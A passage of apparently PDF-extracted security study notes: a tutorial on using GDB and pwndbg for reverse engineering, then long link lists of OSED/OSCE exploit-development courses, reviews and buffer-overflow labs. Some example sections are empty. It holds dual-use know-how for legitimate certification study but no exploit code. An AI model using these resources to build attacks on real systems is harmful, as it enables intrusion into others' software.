engineering toolkit.
Vanilla GDB
GDB without any modifications is unintuitive and obscures a lot of useful information. The
plug-in pwndbg solves a lot of these problems and makes for a much more pleasant experience.
But if you are constrained and have to use vanilla gdb, here are several things to make your life
easier.
Starting GDB
Disassembly
(gdb) disassemble [address/symbol] will display the disassembly for that function/frame
GDB accepts any unambiguous abbreviation of a command, so saying (gdb) disas main suffices
if you'd like to see the disassembly of main
Another handy thing to see while stepping through a program is the disassembly of nearby
instructions:
• [± offset] allows you to specify how you would like the data offset from the current
instruction
Example Usage
This command will show 10 instructions on screen with an offset from the next instruction of
5, giving us this display:
Deleting Views
If, for whatever reason, a view no longer suits your needs, simply call (gdb) info display, which
will give you a list of active displays:
1: y /10bi $pc-0x5
Then simply execute (gdb) delete display 1 and your execution will resume without the display.
Registers
In order to view the state of registers with vanilla gdb, you need to run the command info
registers which will display the state of all the registers:
ebx 0x0 0
eflags 0x286 [ PF SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
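The bracketed flag names GDB prints next to eflags are a decoding of individual bits in the register value. As an illustration, the following sketch decodes the value shown above; the bit positions are the documented x86 status and control flags, while the EFLAGS_BITS table and decode_eflags function are hypothetical names.

```python
# Bit positions of the commonly displayed x86 EFLAGS bits.
EFLAGS_BITS = {
    0: "CF",   # carry
    2: "PF",   # parity
    4: "AF",   # auxiliary carry
    6: "ZF",   # zero
    7: "SF",   # sign
    8: "TF",   # trap
    9: "IF",   # interrupt enable
    10: "DF",  # direction
    11: "OF",  # overflow
}

def decode_eflags(value):
    """Return the names of the flags that are set, lowest bit first."""
    return [name for bit, name in sorted(EFLAGS_BITS.items()) if value & (1 << bit)]

print(decode_eflags(0x286))
# → ['PF', 'SF', 'IF']
```

Bit 1 of EFLAGS is reserved and always reads as 1, which is why 0x286 contains 0x2 even though no named flag corresponds to it.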
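If you simply would like to see the contents of a single register, use info registers [register]
or p/x $[register]. Note that x/x $[register] examines the memory at the address held in the
register rather than the register itself.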
Pwndbg
Setting Breakpoints
Setting breakpoints in GDB uses the format b *[Address] for an address or b [Symbol] for a
function name
Example Usage
Deleting Breakpoints
As with views, in order to delete a breakpoint, you can list the available breakpoints using
(gdb) info breakpoints (don't forget that GDB accepts abbreviations, you don't always need to
type out every command!) which will display all breakpoints:
Note
Stepping
What good is a debugger if you can't control where you are going? In order to begin execution
of a program, use the command r [arguments], similar to how you would execute it with
dot-slash notation as ./program [arguments]. If no breakpoints are set, the program will run
normally. If you have breakpoints set, you will stop at that instruction.
• (gdb) step [count]: Steps one source line the specified number of times, entering called
functions, default is 1 (shorthand s); stepi (shorthand si) does the same per instruction
• (gdb) nexti [# of instructions]: Steps over an instruction, meaning it will not
delve into called functions (shorthand ni)
• (gdb) finish: Runs until the current function returns and breaks right after it (shorthand fin)
Examining
Examining data in GDB is also very useful for seeing how the program is affecting data. The
notation may seem complex at first, but it is flexible and provides powerful functionality.
• x/ means examine
• [format] means how the data should be interpreted such as an instruction i, a string s,
hex bytes x
Example Usage
• (gdb) x/x $rax: Displays the memory at the address held in the register RAX as hex (use
p/x $rax to print the register's own value)
Forking
If the program happens to be an accept-and-fork server, gdb will have issues following the
child or parent processes. In order to specify which process gdb should follow after a fork, you
can use the command set follow-fork-mode [parent/child]
Setting Data
If you would like to set data at any point, it is possible using the
command set $[Register]=[Hex Data] for a register or set {[type]}[Address]=[Hex Data] for
memory
Example Usage
Process Mapping
A handy way to find the process's mapped address spaces is to use info proc map:
This will show you where the stack, heap (if there is one), and libc are located.
Attaching Processes
Another useful feature of GDB is the ability to attach to processes which are already running.
Simply launch gdb using gdb, then find the process id of the program you would like to attach to
and execute attach [pid].
https://ctf101.org/reverse-engineering/what-is-gdb/
https://www.udemy.com/course/mips-assembly/
https://www.udemy.com/course/x86-assembly-programming-from-ground-uptm/
https://www.udemy.com/course/complete-x86-assembly-language-120-practical-exercise/
https://www.udemy.com/course/x86-assembly-language-programming-masters-course/
https://www.udemy.com/course/c-programming-for-beginners-programming-in-c/
https://www.udemy.com/course/c-programming-for-beginners-/
https://www.udemy.com/course/the-complete-c-programming-bootcamp/
https://www.udemy.com/course/advanced-c-programming-course/
https://www.udemy.com/course/beginning-c-plus-plus-programming/
https://www.youtube.com/watch?v=8jLOx1hD3_o
https://www.youtube.com/watch?v=GQp1zzTwrIg
https://www.youtube.com/watch?v=oZeezrNHxVo&list=PLIfZMtpPYFP5qaS2RFQxcNVkmJLGQ
wyKE
https://www.auladeanatomia.com/en/anatomia/459/laboratory-assembly
https://www.pentesteracademy.com/video?id=171
Study Material – OSED
• https://github.com/r0r0x-xx/OSED-Pre
• https://github.com/snoopysecurity/OSCE-Prep
• https://github.com/epi052/osed-scripts
• https://www.exploit-db.com/windows-user-mode-exploit-development
• https://github.com/sradley/osed
• https://github.com/Nero22k/Exploit_Development
• https://www.youtube.com/watch?v=7PMw9GIb8Zs
• https://www.youtube.com/watch?v=FH1KptfPLKo
• https://www.youtube.com/watch?v=sOMmzUuwtmc
• https://blog.exploitlab.net/
• https://azeria-labs.com/heap-exploit-development-part-1/
• http://zeroknights.com/getting-started-exploit-lab/
• https://drive.google.com/file/d/1poocO7AOMyBQBtDXvoaZ2dgkq3Zf1Wlb/view?usp=
sharing
• https://drive.google.com/file/d/1qPPs8DHbeJ6YIIjbsC-
ZPMajUeSfXw6N/view?usp=sharing
• https://drive.google.com/file/d/1RdkhmTIvD6H4uTNxWL4FCKISgVUbaupL/view?usp=s
haring
• https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-
based-overflows/
• https://github.com/wtsxDev/Exploit-Development/blob/master/README.md
• https://github.com/corelan/CorelanTraining
• https://github.com/subat0mik/Journey_to_OSCE
• https://github.com/nanotechz9l/Corelan-Exploit-tutorial-part-1-Stack-Based-
Overflows/blob/master/3%20eip_crash.rb
• https://github.com/bigb0sss/OSCE
• https://github.com/epi052/OSCE-exam-practice
• https://github.com/mdisec/osce-preparation
• https://github.com/mohitkhemchandani/OSCE_BIBLE
• https://github.com/FULLSHADE/OSCE
• https://github.com/areyou1or0/OSCE-Exploit-Development
• https://github.com/securityELI/CTP-OSCE
• https://drive.google.com/file/d/1MH9Tv-
YTUVrqgLT3qJDBl8Ww09UyF2Xc/view?usp=sharing
• https://www.coalfire.com/the-coalfire-blog/january-2020/the-basics-of-exploit-
development-1
• https://connormcgarr.github.io/browser1/
• https://kalitut.com/exploit-development-resources/
• https://github.com/0xZ0F/Z0FCourse_ExploitDevelopment
• https://github.com/dest-3/OSED_Resources/
• https://resources.infosecinstitute.com/topic/python-for-exploit-development-
common-vulnerabilities-and-exploits/
• https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-
concept/
• https://samsclass.info/127/127_WWC_2014.shtml
• https://stackoverflow.com/questions/42615124/exploit-development-in-python-3
• https://cd6629.gitbook.io/ctfwriteups/converting-metasploit-modules-to-python
• https://subscription.packtpub.com/book/networking_and_servers/9781785282324/8
• https://www.cybrary.it/video/exploit-development-part-5/
• https://spaceraccoon.dev/rop-and-roll-exp-301-offensive-security-exploit-
development-osed-review-an
• https://help.offensive-security.com/hc/en-us/articles/360052977212-OSED-Exam-
Guide
• https://www.youtube.com/watch?v=0n3Li63PwnQ
• https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-
development-review/
• https://pythonrepo.com/repo/epi052-osed-scripts
• https://github.com/dhn/OSEE
Reviews
• https://www.youtube.com/watch?v=aWHL9hIKTCA
• https://www.youtube.com/watch?v=62mWZ1xd8eM
• https://ihack4falafel.github.io/Offensive-Security-AWEOSEE-Review/
• https://www.linkedin.com/pulse/advanced-windows-exploitation-osee-review-etizaz-
mohsin-/
• https://animal0day.blogspot.com/2018/11/reviews-for-oscp-osce-osee-and-
corelan.html
• https://addaxsoft.com/blog/offensive-security-advanced-windows-exploitation-awe-
osee-review/
• https://jhalon.github.io/OSCE-Review/
• https://www.youtube.com/watch?v=NAe6f1_XG6Q
• https://blog.kuhi.to/offsec-exp301-osed-review
• https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-
development-review/
• https://spaceraccoon.dev/rop-and-roll-exp-301-offensive-security-exploit-
development-osed-review-and/
Labs
• https://github.com/CyberSecurityUP/Buffer-Overflow-Labs
• https://github.com/ihack4falafel/OSCE
• https://github.com/nathunandwani/ctp-osce
• https://github.com/firmianay/Life-long-Learner/blob/master/SEED-labs/buffer-
overflow-vulnerability-lab.md
• https://github.com/wadejason/Buffer-Overflow-Vulnerability-Lab
• https://github.com/Jeffery-Liu/Buffer-Overflow-Vulnerability-Lab
• https://github.com/mutianxu/SEED-LAB-Bufferoverflow_attack
• https://my.ine.com/CyberSecurity/courses/54819bbb/windows-exploit-development
• https://connormcgarr.github.io/browser1/
• https://www.coalfire.com/the-coalfire-blog/january-2020/the-basics-of-exploit-
development-1
• https://pentestmag.com/product/exploit-development-windows-w38/
• https://steflan-security.com/complete-guide-to-stack-buffer-overflow-
oscp/#:~:text=Stack%20buffer%20overflow%20is%20a,of%20the%20intended%20data
%20structure.
• https://www.offensive-security.com/vulndev/evocam-remote-buffer-overflow-on-osx/
• https://www.exploit-db.com/exploits/42928
• https://www.exploit-db.com/exploits/10434